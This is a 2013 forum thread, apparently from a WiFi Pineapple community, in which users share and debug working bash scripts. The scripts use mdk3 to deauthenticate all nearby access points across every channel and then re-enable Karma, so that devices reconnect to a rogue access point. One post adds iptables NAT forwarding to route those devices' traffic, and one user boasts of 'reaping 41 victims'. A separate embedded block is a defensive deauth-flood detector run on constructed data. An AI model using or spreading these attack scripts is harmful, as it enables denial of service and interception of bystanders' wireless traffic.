Foxtrot, posted February 22, 2013 (edited March 16, 2013):

Hey guys! I am currently making a script that basically:

- Asks for a MAC to avoid.
- Asks how long to deauth for
- Asks what interface to deauth on
- Disables karma
- Puts wlan0 into RFMON (Monitor Mode)
- Starts MDK3 Deauthing for x amount of seconds inputted at the beginning
- After x amount of seconds, Stops MDK3
- Removes mon0
- Starts karma again

The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple. Although this can be done manually, I thought a nice script would be nice that did it for you :)

Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma

In case it wasn't obvious, when I update the script, you have to replace the existing script you have with the new code...

***Module Development and further script development***

As suggested by some people, I have decided to take a go at developing a pineapple module that will automate 'attacks' such as the MDKarma script and other tricks I have planned from a UI, as well as flexibility such as being able to edit the scripts to suit your needs without SSH'ing into the pineapple to edit... I hope you all share your edits too and continue with feedback that helps add features :)....

--------------------------------------------------------------------------------

Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :)

Edit : Version 1.2.3 - Added Whitelisting.

Please give some feedback and any improvements :)

Code :

```
#!/bin/bash
#Part of the Pineapple Mojito Framework
#Made by Foxtrot
#Version 1.2.3

#Intro
echo "!! This script is to be used only for legal, safe and authorised uses !!"
echo "MDKarma V1.2.3"
sleep 6

#Ask how long to deauth for
echo -n "How long (In Seconds) to deauth for? : "; read deauthTime

#Ask what Interface
echo -n "What interface would you like to deauth on? : "; read deauthInterface

#Ask if you want to whitelist
read -r -p "Do you want to add a whitelist? [Y/n] " response
if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
then
    echo " "
    echo "Whitelist Created!"
    echo " "
    touch whitelist.txt
    read -r -p "MAC Address to add : " macaddr
    echo $macaddr >> whitelist.txt
else
    echo " "
    echo "Avoiding Whitelist Creation!"
    echo " "
fi

#Put wlan0 up
echo "Checking Interface wlan0 is up...."
wifi
sleep 3

#Stop Karma
echo " "
echo "Killing Karma...."
hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null
sleep 3

#Put deauthInterface into monitor mode
echo " "
echo "Putting $deauthInterface into monitor mode...."
airmon-ng start $deauthInterface > /dev/null
sleep 3

#Start deauthing with MDK3 and stop
echo " "
echo "Deauthing Access Points with MDK3...."
mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 &
sleep $deauthTime && killall mdk3
sleep 3

#Kill airmon-ng and start Karma again.
echo "Removing mon0 and enabling karma...."
airmon-ng stop mon0 > /dev/null
wifi
hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null
sleep 3

#Finish
echo " "
echo "MDKarma Finished!"
```

-Foxtrot

Boba Fett, posted February 22, 2013 (edited February 22, 2013):

Nice!!!!!! I can run this script from Pineapple GUI?

Foxtrot, posted February 22, 2013 (edited February 22, 2013):

Edit : Basically, it won't run from a WPS script set with Whistle Master's 'button' module, because I plan to incorporate features that require user input.

-Foxtrot

Boba Fett, posted February 22, 2013:

Let me try it!

Foxtrot, posted February 22, 2013:

> let me try it!

That's why I posted it :p

-Foxtrot

Boba Fett, posted February 22, 2013:

Doesn't work for me :-(

Foxtrot, posted February 22, 2013:

> Doesn't work for me :-(

Would help if you included some more detail. It works fine for me.

-Foxtrot

Boba Fett, posted February 22, 2013:

The script runs, but doesn't disconnect my iMac, my Windows 7 laptop or my Blackberry 9810. They remain connected.

Foxtrot, posted February 22, 2013 (edited February 22, 2013):

> The script runs, but doesn't disconnect my iMac, my Windows 7 laptop or my Blackberry 9810. They remain connected.

Ah crap, replace the whole code in the .sh file you have with the one in the first post :) The problem is the time I set it to. I am working on getting it so you enter a time you want to deauth for, but bash is making me look like a fool haha

If it still fails to deauth, increase the time in the sleep here

```
mdk3 mon0 d & sleep 45 && killall mdk3
```

but on the script (Duh)

-Foxtrot

Zephyr, posted February 22, 2013:

> Nice!!!!!! I can run this script from Pineapple GUI?

Not sure but I believe it may have been meant to be run as a startup script or via the WPS button.

Foxtrot, posted February 22, 2013:

> Not sure but I believe it may have been meant to be run as a startup script or via the WPS button.

Gah, updated the first post with how to run it, should've put it there in the first place, sorry!

-Foxtrot

Boba Fett, posted February 22, 2013:

Weird, now the script does not run.

Boba Fett, posted February 22, 2013:

I'm running the script on the button (custom script 1) module. I increased the time on the script to 120 and nothing yet, can't get deauth on my devices. I don't know why :-(

Boba Fett, posted February 22, 2013:

This is my log:

```
22:03:10 Pineapple authpriv.info dropbear[3365]: Exit (root): Exited normally
22:01:22 Pineapple kern.info kernel: [ 1593.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.130000] device wlan0 entered promiscuous mode
22:01:19 Pineapple kern.info kernel: [ 1590.380000] device wlan0 left promiscuous mode
22:01:19 Pineapple kern.info kernel: [ 1590.380000] br-lan: port 2(wlan0) entered disabled state
```

Foxtrot, posted February 22, 2013:

> This is my log:
>
> 22:03:10 Pineapple authpriv.info dropbear[3365]: Exit (root): Exited normally
> 22:01:22 Pineapple kern.info kernel: [ 1593.230000] br-lan: port 2(wlan0) entered forwarding state
> 22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
> 22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
> 22:01:20 Pineapple kern.info kernel: [ 1591.130000] device wlan0 entered promiscuous mode
> 22:01:19 Pineapple kern.info kernel: [ 1590.380000] device wlan0 left promiscuous mode
> 22:01:19 Pineapple kern.info kernel: [ 1590.380000] br-lan: port 2(wlan0) entered disabled state

Dude. I thought you meant you were running it from the Advanced section, I said I think it might run. It is meant to be run from SSH.

-Foxtrot

Boba Fett, posted February 22, 2013:

Ah ok. Let me try by SSH. It will be nice if it runs with the button option, for making a portable deauth.

Boba Fett, posted February 23, 2013:

Nothing. I run the script via SSH, the script runs, but my iMac, PC Win 7 or Blackberry et deauthenticate.

PineDominator, posted February 23, 2013:

> Nothing. I run the script via SSH, the script runs, but my iMac, PC Win 7 or Blackberry et deauthenticate.

Last July I made a setup script for mdk3 on the pineapple. I can dig it up if you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT?

Foxtrot, posted February 23, 2013:

> Last July I made a setup script for mdk3 on the pineapple. I can dig it up if you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT?

Hmmm. Strange, it seems to d/c my laptop from my AP, but I can't do much testing as my antenna is broken atm ;(... I feel shame haha

-Foxtrot

PineDominator, posted February 23, 2013:

```
#!/bin/sh
airmon-ng start $1
ifconfig $1 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt
mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &
sleep 35
killall -9 mdk3
airmon-ng stop mon0
```

This script is designed to work with an external wifi adapter like the Alfa NHA. I used this script after connecting my external adapter to a router for internet.

```
#!/bin/sh
#Change the Mac address of the usb wifi to something random.
ifconfig $1 down
macchanger -A $1
ifconfig $1 up

#WPA2 - Let's assume we're going to connect to a WPA2 network
wpa_supplicant -B -D nl80211 -i $1 -c /usb/wpa_supplicant.conf

#WEP - Uncomment if you want to connect to a WEP network
#iwconfig $1 mode managed key your_key_here
#iwconfig $1 essid "your access point name here"

#OPEN - Uncomment if you want to connect to an open network
#iwconfig $1 essid "your access point name here"

#Setup ipforwarding via iptables.
echo 1 > /proc/sys/net/ipv4/ip_forward

#Reset iptables
#iptables -F
#iptables -X
iptables -A FORWARD -o $1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE

#Wait for 7 seconds to give enough time for association.
sleep 7

#Grab an ip via DHCP
udhcpc -i $1
```

The code above is to connect to a wireless router. Now you can run the mdk3 script as such:

```
./deauth.sh wlan1
```

wlan1 is the external wifi adapter already connected to a wireless access point. The script will add the MAC of wlan1 to a whitelist so mdk3 won't deauth it from the internet. It then runs for 35 seconds, enough time to deauth all channels, then it kills the process and disables the mon0 interface.

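Seen from the monitoring side, the run described in the post above (deauth frames sent across every channel for a fixed number of seconds) stands out because many BSSIDs on several channels are hit inside one short window. The following is an added example, not code from any poster in this thread; the one-frame-per-line input format, the thresholds and the sample frames are all constructed assumptions.

```shell
#!/bin/sh
# Added defender-side example: flag windows in which deauthentication frames
# hit several BSSIDs on several channels, the footprint of a channel-hopping
# broadcast deauth run. Input format (an assumption of this example), one
# observed deauth frame per line: <epoch_seconds> <channel> <bssid> <dest_mac>
WINDOW=10       # seconds per bucket (assumed threshold)
MIN_FRAMES=20   # deauth frames in a bucket before it is considered
MIN_BSSIDS=3    # distinct BSSIDs named in those frames
MIN_CHANNELS=2  # distinct channels they were seen on

detect_deauth_flood() {
    awk -v win="$WINDOW" -v minf="$MIN_FRAMES" \
        -v minb="$MIN_BSSIDS" -v minc="$MIN_CHANNELS" '
    NF == 4 && $1 ~ /^[0-9]+$/ {
        b = int($1 / win) * win                 # start of this time bucket
        frames[b]++
        if (!((b, "B", $3) in seen)) { seen[b, "B", $3] = 1; bssids[b]++ }
        if (!((b, "C", $2) in seen)) { seen[b, "C", $2] = 1; chans[b]++ }
    }
    END {
        for (b in frames)
            if (frames[b] >= minf && bssids[b] >= minb && chans[b] >= minc)
                printf "ALERT window=%d frames=%d bssids=%d channels=%d\n",
                       b, frames[b], bssids[b], chans[b]
    }' | sort
}

# Constructed sample capture (not real traffic).
sample_capture() {
    awk 'BEGIN {
        # flood: 24 broadcast deauths naming 3 BSSIDs on channels 1, 6, 11
        for (i = 0; i < 24; i++)
            printf "%d %d 02:00:00:00:00:%02x ff:ff:ff:ff:ff:ff\n",
                   1000 + i % 10, (i % 3) * 5 + 1, 16 + i % 3
        # benign: one AP dropping its own 25 clients on a single channel
        for (i = 0; i < 25; i++)
            printf "%d 6 02:00:00:00:00:aa 02:00:00:00:01:%02x\n", 1050 + i % 10, i
        # benign: a single client leaving its AP
        print "1030 11 02:00:00:00:00:bb 02:00:00:00:02:01"
    }'
}

sample_capture | detect_deauth_flood
```

Only the first window is reported; the single-AP burst and the lone deauth stay below the BSSID and channel thresholds.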
Foxtrot, posted February 23, 2013:

Nice script petertfm! Kinda puts mine to shame. Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should...

-Foxtrot

PineDominator, posted February 24, 2013 (edited February 24, 2013 by petertfm):

> Nice script petertfm! Kinda puts mine to shame. Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should... -Foxtrot

Thanks. But your script is still useful because it's killing hostapd and running on the internal wifi. When Whistle Master's button module was working I tied the WPS button to the deauth script. Only thing I had to do was, because mdk3 had been installed to my USB, it needs a symlink to the internal folder location. My mk4 setup script now symlinks all opkg packages installed to USB to the internal folder structure.

condor, posted February 24, 2013:

Works great! First test reaped 41 victims. Well done...and simple.

Whistle Master, posted February 24, 2013:

> Thanks. But your script is still useful because it's killing hostapd and running on the internal wifi. When Whistle Master's button module was working I tied the WPS button to the deauth script. Only thing I had to do was, because mdk3 had been installed to my USB, it needs a symlink to the internal folder location. My mk4 setup script now symlinks all opkg packages installed to USB to the internal folder structure.

WPS button is indeed broken in the last firmware version, this is why the button module is not working at the moment :(

PineDominator, posted February 24, 2013:

> Works great! First test reaped 41 victims. Well done...and simple.

Awesome :-) The one thing I would like to work on is to save what monitor interface was created to a variable, instead of assuming mon0. Any thoughts on how to do this? Maybe grep and awk the output from airmon-ng $1